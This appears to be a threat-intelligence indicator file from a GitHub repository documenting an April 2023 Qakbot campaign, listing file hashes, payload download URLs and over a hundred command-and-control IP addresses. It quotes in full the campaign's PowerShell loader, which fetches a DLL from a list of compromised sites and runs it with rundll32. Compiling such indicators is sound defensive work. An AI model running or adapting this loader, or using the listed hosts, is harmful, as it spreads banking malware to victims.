-
Notifications
You must be signed in to change notification settings - Fork 32
/
Qakbot_BB22_04.04.2023.txt
166 lines (150 loc) · 4.27 KB
/
Qakbot_BB22_04.04.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
04.04.2023 | Qakbot | BB22 | Campaign 1680515593 | Version 404.909
*************************************************
.pdf Qui.pdf
.wsf 8c30e0e3546829c7c7007b2720151342b945a6593be960cd060cee17829c95cd
.dll d7608b8f684e7465599a4673fefa329de646e38d934dd79e592288c68720bcfa
*************************************************
Exec >
WScript.exe C:\Users\Admin\AppData\Local\Temp\YYJisvOrTyh4ipuSPcPktI6PJnQAc12G81Gew.wsf
Start-Sleep -Seconds 4;$outdodge = ("https://bebessi.com.tr/Q9QbSi/iUe4zIn3M,https://immunoliderazgoyoportunidad.com/xqa6Cny/fUQZ3fm,http://unitedec-eg.com/IFU6llZ/rNd6zIAi9io,https://comunidadehebrom.com.br/0P16/hSVulG,https://blogdocisneiros.com.br/GOm/HxLFKrhD,https://cozarqingenieria.com.mx/R5Awkh4/NSLqhWtk6,https://theyoungandtheratchet.com/IzvO/yt8YajyNqgcB,https://thewatchzonebd.com/tkh4PH/ckSQT8zTx").split(",");foreach ($simplesse in $outdodge) {try {wget $simplesse -TimeoutSec 15 -O $env:TEMP\Discoloration.Barricade;if ((Get-Item $env:TEMP\Discoloration.Barricade).length -ge 100000) {start rundll32 $env:TEMP\\Discoloration.Barricade,X555;break;}}catch {Start-Sleep -Seconds 4;}}
*************************************************
https://bebessi.com.tr/Q9QbSi/puangaKPpjD
https://comunidadehebrom.com.br/0P16/i4dlZCkHEk
https://theyoungandtheratchet.com/IzvO/EuVTmZEBRFw
http://unitedec-eg.com/IFU6llZ/cO5RcAa
https://thewatchzonebd.com/tkh4PH/SBL8BMSeA2rY
https://blogdocisneiros.com.br/GOm/lD1vhf
https://immunoliderazgoyoportunidad.com/xqa6Cny/Qt0pPfeBAM
https://cozarqingenieria.com.mx/R5Awkh4/JZGpFCLYUsr
05/04/2023 - Updated distro
https://propertynear.co.uk/QyYWyp/XRgRWEdFv
https://graficalevi.com.br/0p6P/R94icuyQ
http://rosewoodlaminates.com/hea/yWY9SJ4VOH
https://chimpcity.com/h7e/p5FuepRZjx
https://kmphi.com/FWovmB/8oZ0BOV5HqEX
https://theshirtsummit.com/MwBGSm/lGP5mGh
https://capitalperurrhh.com/vQ1iQg/u6oL8xlJ
https://agtendelperu.com/FPu0Fa/EpN5Xvh
https://centerkick.com/IC5EQ8/2v6u6vKQwk8
*************************************************
c2's
109.218.86.223:2222
78.130.215.67:443
70.112.206.5:443
12.172.173.82:50001
201.244.108.183:995
96.87.28.170:2222
76.80.180.154:993
95.60.243.24:995
87.202.101.164:50000
86.225.214.138:2222
74.66.134.24:443
72.203.216.98:2222
92.239.81.124:443
37.189.1.102:443
144.64.226.144:443
202.142.98.62:443
12.172.173.82:993
71.171.83.69:443
139.226.47.229:995
197.204.234.123:443
92.1.170.110:995
47.205.25.170:443
37.14.229.220:2222
92.20.204.198:2222
184.161.74.73:443
92.27.86.48:2222
84.215.202.8:443
92.154.17.149:2222
100.10.72.114:443
88.122.133.88:32100
176.171.4.107:2222
78.16.156.25:443
27.99.32.26:2222
86.98.23.66:443
119.82.123.160:443
116.75.63.150:443
103.42.86.42:995
103.212.19.254:995
190.191.35.122:443
12.172.173.82:2087
90.55.106.37:2222
116.72.250.18:443
202.142.98.62:995
122.184.143.83:443
85.241.180.94:443
103.140.174.20:2222
50.68.204.71:995
109.150.179.215:2222
12.172.173.82:465
27.109.19.90:2078
123.3.240.16:995
69.119.123.159:2222
77.126.11.114:443
91.82.133.77:443
74.92.243.115:50000
12.172.173.82:21
73.36.196.11:443
172.115.17.50:443
112.222.83.147:6881
69.133.162.35:443
45.50.233.214:443
27.0.48.233:443
78.192.109.105:2222
178.175.187.254:443
88.164.20.177:21
47.21.51.138:443
43.243.215.206:443
49.245.95.124:2222
12.172.173.82:32101
87.223.89.244:443
188.79.242.89:2222
50.68.204.71:443
84.35.26.14:995
35.143.97.145:995
184.153.132.82:443
76.170.252.153:995
2.82.8.80:443
47.34.30.133:443
81.229.117.95:2222
50.68.204.71:993
103.111.70.66:443
12.172.173.82:22
24.236.90.196:2078
114.143.176.235:443
103.144.201.53:2078
157.119.85.203:443
103.111.70.66:995
202.184.218.218:443
109.154.254.126:2222
125.99.76.102:443
86.195.14.72:2222
80.13.205.69:2222
50.68.186.195:443
176.142.207.63:443
78.69.251.252:2222
213.91.235.146:443
122.186.210.254:443
174.4.89.3:443
75.143.236.149:443
198.2.51.242:993
82.41.36.110:22
75.90.114.237:995
109.11.175.42:2222
151.62.55.207:443
197.0.146.16:443
71.38.155.217:443
12.172.173.82:20
162.248.14.107:443
98.145.23.67:443
86.154.216.221:2222
84.155.13.118:995
70.160.80.210:443
103.113.68.33:443
193.253.100.236:2222
12.172.173.82:995
72.134.124.16:443
108.32.72.145:443
161.142.103.5:995
86.143.119.184:995
197.1.218.172:443